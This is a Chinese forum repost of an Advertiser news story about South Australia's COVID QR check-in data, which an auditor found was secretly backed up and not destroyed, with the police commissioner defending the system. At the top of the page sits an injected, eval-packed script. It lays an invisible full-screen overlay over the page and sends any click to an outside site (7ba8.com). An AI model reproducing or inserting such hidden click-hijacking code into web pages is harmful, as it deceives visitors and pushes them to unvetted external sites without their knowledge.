南澳二维码签到备份数据存在安全隐患!

楼主
跳转到指定楼层
<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>
警察局长Grant Stevens对二维码签到发起了强有力的辩护,称他对该系统有信心。

The Advertiser周二独家披露,该州的首席审计师发现,从二维码收集的个人数据没有按照法律规定销毁。

周二提交给州议会的为期7个月的审查报告,也暴露了南澳卫生部在控制Covid-19记录方面的数据 &quot;缺陷&quot;。

Grant Stevens先生为QR系统辩护,并说数据存储的 &quot;险恶 &quot;观点令人失望。

Grant Stevens先生告诉ABC电台的Ali Clarke说:&quot;令人失望的是,这种,怎么说呢,阴险的观点被放在数据管理的方式上。&quot;

&quot;我绝对相信,销毁数据的意图和承诺正在得到兑现。&quot;

当局表示,在任何罕见的恢复过程中,超过28天的数据都会被自动删除。


Grant Stevens先生说,每隔28至35天就会删除数据,以便在系统崩溃时保持一个缓冲。

&quot;每28天,在28天后的7天内,所以在35天内,数据就会消失,&quot;他说。

&quot;在这段时间之后,没有人可以访问这些数据。&quot;

&quot;对于任何复杂的IT系统来说,他们备份数据是一个自然的要求,所以如果出现灾难性的系统故障,他们可以检索数据,并在从备份中检索到这些数据时恢复系统,&quot;Stevens先生说。

&quot;我们可能拥有澳大利亚最好的QR系统,而且管理得非常好。&quot;

早些时候,The Advertiser披露,该州的首席审计员发现,从二维码收集的个人数据没有按照法律规定销毁,而南澳卫生部对Covid-19记录的控制不力,有可能 &quot;泄露 &quot;敏感信息。

尽管州政府一再保证电子联系人追踪记录在28天后被删除,但官方审查发现签到细节被秘密地备份。

虽然审计长Andrew Richardson说这对帮助在任何灾难或系统故障后恢复关键信息 &quot;至关重要&quot;,但政府从未公开披露这一要求。

周二提交给州议会的为期7个月的审查报告,也暴露了南澳卫生部的数据 &quot;缺陷&quot;。

Richardson先生的审查报告于4月被The Advertiser披露,他赞扬了去年12月在使用 &quot;行业最佳实践 &quot;的六周工作后快速推出的Covid-Safe应用程序。

他说,&quot;合理的控制 &quot;保护了用户记录,包括电话号码、数据清除和用户审查适当,同时技术加密也很安全。

当局表示,二维码对于快速追踪任何Covid疫情中的联系人至关重要。

总理和内阁部表示,当不需要追踪接触者时,所有备份数据将被销毁。


最新的数据显示,在90,200个公共场所有近4.3亿个签到记录。

超过3.754亿条记录已经从数据库中清除,然后储存起来。

调查人员对该数据库的 &quot;内在风险 &quot;表示关注,并提出了21项发现--13项关键发现--包括未能正式进行风险检查。

这份长达44页的报告发现,有28名南澳卫生部工作人员使用个人电子邮件地址访问机密记录,而345名机构用户拥有 &quot;不适当的 &quot;数据权限,包括28名管理员。

报告说,这 &quot;增加了 &quot;数据泄露或非法使用的风险。它说:&quot;这可能损害敏感信息的保密性、完整性或可用性。&quot;

​但没有发现违规行为。

SA Health的决定—— &quot;无限期 &quot;保留二维码数据 &quot;不符合 &quot;国家记录法,而一个小企业单位可以访问记录,尽管声称这只是为了联系追踪器。

官员们说,各种审查将根据其结果对该系统进行检修。

南澳卫生部的一位女发言人说,签到数据就像保密的健康记录,受到州法律的保护。

她说:&quot;QR签到信息只有在向南澳州卫生局提出要求时才会被公布,用于官方接触者追踪目的或管理Covid-19疫情,&quot;她说。

&quot;一旦为此目的获得信息,它将作为机密的健康记录进行管理,并受到2008年《保健法》的保护。&quot;

警务专员和州协调人Grant Stevens告诉调查组,所有11项建议都将得到落实。

官员们说,DPC安全地备份了所有关键系统,包括Covid-安全签到系统。

DPC的一位发言人说。&quot;州政府向南澳大利亚人保证,他们的签到数据超过了追踪联系人所需的28天期限,就无法获取。&quot;

但工党卫生发言人 Chris Picton指责政府 &quot;违反了信任&quot;。

他说:&quot;在这次疫情期间,南澳大利亚人做了正确的事情,他们签到并向政府真诚地提供了他们的数据,并承诺他们的数据只用于接触追踪的目的,然后在28天后销毁。&quot;

&quot;对于南澳大利亚人的数据是否安全,存在着......严重的问题。&quot;

​图文来源:The Advertiser


高级模式
B Color Image Link Quote Code Smilies |上传

本版积分规则

楼主其他主题

热点推荐

Copyright © 2020-2021 tigtag.com |网站地图  
快速回复 返回列表 返回顶部